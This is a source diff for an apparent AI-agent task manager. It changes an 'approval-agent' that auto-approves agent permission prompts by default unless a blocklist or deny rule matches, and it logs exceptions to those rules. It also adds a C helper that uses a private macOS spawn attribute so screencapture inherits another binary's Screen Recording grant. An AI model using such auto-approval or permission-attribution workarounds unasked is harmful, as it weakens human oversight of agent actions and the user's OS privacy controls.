+      console.log(`[approval-agent] blocklist exception ${blockCheck.exceptionId} suppressed "${blockCheck.suppressed?.reason}" session=${sessionId} cmd="${(context.command || '').slice(0, 200)}"`);
+    }
     if (blockCheck.blocked) {
       console.log(`[approval-agent] BLOCKLIST hit session=${sessionId} category=${blockCheck.category} reason="${blockCheck.reason}" cmd="${(context.command || '').slice(0, 200)}"`);
+      // The Pending card takes its title from commandSummary, so use the operative
+      // COMMAND (what the user must judge), not the blocklist reason. The reason
+      // stays in `reasoning` ("Why escalated" + isBlocklistGroup detection).
+      const parts = escalationCommandParts(context);
       const decision = {
         sessionId,
         toolName: context.toolName,
-        commandSummary: `Blocklist: ${blockCheck.reason}`,
+        commandSummary: parts.title || `Blocklist: ${blockCheck.reason}`,
         fullContext: context.fullContext.slice(0, 2000),
         warning: context.warning,
         decision: 'escalated',
         reasoning: `Dangerous-command blocklist matched (${blockCheck.category}): ${blockCheck.reason}`,
         decidedBy: 'blocklist',
         riskLevel: 'high',
-        commandSignature,
+        commandSignature: parts.signature || commandSignature,
       };
       let decisionId;
       try { decisionId = dbModule.addApprovalDecision(decision); } catch (e) { console.error('[approval-agent] DB error:', e.message); }
@@ -1930,10 +2229,13 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   if (permMatch && permMatch.action === 'deny') {
     const reasoning = `Permission Manager deny rule matched: ${permMatch.rule}`;
     try {
+      const parts = escalationCommandParts(context);
       dbModule.addApprovalDecision({
-        sessionId, toolName: context.toolName, commandSummary: `Denied: ${permMatch.rule}`,
+        sessionId, toolName: context.toolName,
+        commandSummary: parts.title || `Denied: ${permMatch.rule}`,
         fullContext: context.fullContext.slice(0, 2000), warning: context.warning,
-        decision: 'escalated', reasoning, decidedBy: 'user-deny', riskLevel: 'high', commandSignature,
+        decision: 'escalated', reasoning, decidedBy: 'user-deny', riskLevel: 'high',
+        commandSignature: parts.signature || commandSignature,
       });
     } catch (e) { console.error('[approval-agent] DB error:', e.message); }
     broadcastFn(sessionId, session, {
@@ -1944,6 +2246,10 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
     return true;
   }
   const userAllowed = !!(permMatch && permMatch.action === 'allow');
+  const viaException = userAllowed ? permMatch.viaException : null;
+  if (viaException) {
+    console.log(`[approval-agent] deny rule ${permMatch.rule} excepted (${viaException.type}: ${viaException.value}) session=${sessionId} cmd="${(context.command || '').slice(0, 200)}"`);
+  }
   // ── Allow-by-default ──────────────────────────────────────────────────────
   // Auto-approve everything not on the denylist. The blocklist above is the
@@ -1952,12 +2258,15 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   // opinion on medium+ risk and can escalate. User-allowed commands skip it.
   const matchingRule = findMatchingRule(context);
   const heuristic = matchingRule ? null : reviewWithHeuristics(context);
-  const label = userAllowed ? `Allowed: ${permMatch.rule}`
+  const label = userAllowed
+    ? (viaException ? `Excepted from ${permMatch.rule} (${viaException.value})` : `Allowed: ${permMatch.rule}`)
     : matchingRule ? matchingRule.label : (heuristic.ruleLabel || context.toolName);
   const decidedBy = userAllowed ? 'user-allow' : (matchingRule ? 'rule' : 'auto');
   const riskLevel = matchingRule ? (matchingRule.risk_level || 'low') : (heuristic ? (heuristic.riskLevel || 'low') : 'low');
   const reasoning = userAllowed
-    ? `Permission Manager allow rule matched: ${permMatch.rule}`
+    ? (viaException
+        ? `Deny rule ${permMatch.rule} excepted (${viaException.type} ${viaException.value})`
+        : `Permission Manager allow rule matched: ${permMatch.rule}`)
     : matchingRule ? `Matched learned rule: ${matchingRule.label}`
     : 'Auto-approved by default (not on the denylist)';
@@ -2001,15 +2310,22 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
 module.exports = {
   parseApprovalContext,
   isLiveApprovalPrompt,
+  isPlanApprovalPrompt,
+  planCardFingerprint,
+  cardTextFingerprint,
   hasComposerStatusFooter,
   reviewWithHeuristics,
   _splitShellClauses,
   _isProcessControlClause,
+  _isControlFlowClause,
+  _stripLeadingControlKeyword,
+  _isDevCleanupCommand,
+  _isTmpScopedRmClause,
+  _isPortScopedKillClause,
   _buildSessionContext,
   normalizeCommandSignature,
   escalationCommandParts,
   classifyBlockReason,
-  _rescueCandidateActionable,
   findMatchingRule,
   getApproveKeystroke,
   sendApprovalKeystroke,
@@ -2020,4 +2336,8 @@ module.exports = {
   handleApprovalCheck,
   decideApproval,
   clearSessionDedup(sessionId) { _lastApproval.delete(sessionId); },
+  // Record that the human is manually driving `sessionId` right now, so the auto-approver
+  // backs off (see _userIsDriving / sendApprovalKeystroke). Called from server.js handleInput.
+  markUserActive(sessionId) { if (sessionId) _userActiveAt.set(sessionId, Date.now()); },
+  _userIsDriving,
 };

package/template/claude-task-manager/bin/ctm-disclaim.c ADDED Viewed

@@ -0,0 +1,42 @@
+// ctm-disclaim — run a command as its OWN TCC "responsible process".
+//
+// macOS attributes Screen Recording (and other TCC permissions) to the *responsible
+// process*, which children inherit from their parent — all the way up to the launchd
+// daemon. CTM runs from a self-signed .app bundle (com.walle.ctm), and macOS won't let a
+// background daemon get a Screen Recording prompt granted for it, so any `screencapture`
+// CTM spawns is denied. The user's real `node` binary, however, already has the grant.
+//
+// responsibility_spawnattrs_setdisclaim() (the same private spawn attribute LaunchServices
+// uses when it `open`s an app) breaks the inheritance: the spawned process becomes its own
+// responsible process. So `ctm-disclaim <real-node> -e "<run screencapture>"` makes that
+// node its own responsible identity (the granted "node"), and the screencapture it spawns
+// inherits that granted identity instead of com.walle.ctm.
+//
+// Usage: ctm-disclaim <command> [args...]   (exits with the command's exit status)
+#include <errno.h>
+#include <spawn.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include <stdio.h>
+extern int responsibility_spawnattrs_setdisclaim(posix_spawnattr_t *attrs, int disclaim);
+// Spawn argv[1..] with the "disclaim" spawn attribute set and mirror its exit status.
+//
+// Exit codes: 2 on a usage error; the posix_spawn* error number when attribute setup or
+// the spawn itself fails; the child's exit status when it exits normally; 1 otherwise
+// (waitpid failure or abnormal termination of the child).
+int main(int argc, char **argv, char **envp) {
+    if (argc < 2) {
+        fprintf(stderr, "usage: ctm-disclaim <command> [args...]\n");
+        return 2;
+    }
+    posix_spawnattr_t attr;
+    int rc = posix_spawnattr_init(&attr);
+    if (rc != 0) {
+        // Never hand an uninitialised attribute object to posix_spawnp().
+        fprintf(stderr, "ctm-disclaim: posix_spawnattr_init failed (%d)\n", rc);
+        return rc;
+    }
+    // Best effort: the child is still spawned if this fails, but it would keep the
+    // inherited responsible process, so report the failure instead of hiding it.
+    // NOTE(review): assumes the private API returns 0 on success like posix_spawnattr_*.
+    int disclaim_rc = responsibility_spawnattrs_setdisclaim(&attr, 1);
+    if (disclaim_rc != 0) {
+        fprintf(stderr, "ctm-disclaim: warning: setdisclaim failed (%d)\n", disclaim_rc);
+    }
+    pid_t pid;
+    // &argv[1] is already a NULL-terminated argv for the command (argv[argc] == NULL).
+    rc = posix_spawnp(&pid, argv[1], NULL, &attr, &argv[1], envp);
+    posix_spawnattr_destroy(&attr);
+    if (rc != 0) {
+        fprintf(stderr, "ctm-disclaim: spawn failed (%d)\n", rc);
+        return rc;
+    }
+    int status;
+    pid_t waited;
+    // Retry when a signal interrupts the wait; giving up would abandon a live child.
+    do {
+        waited = waitpid(pid, &status, 0);
+    } while (waited < 0 && errno == EINTR);
+    if (waited < 0) return 1;
+    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
+}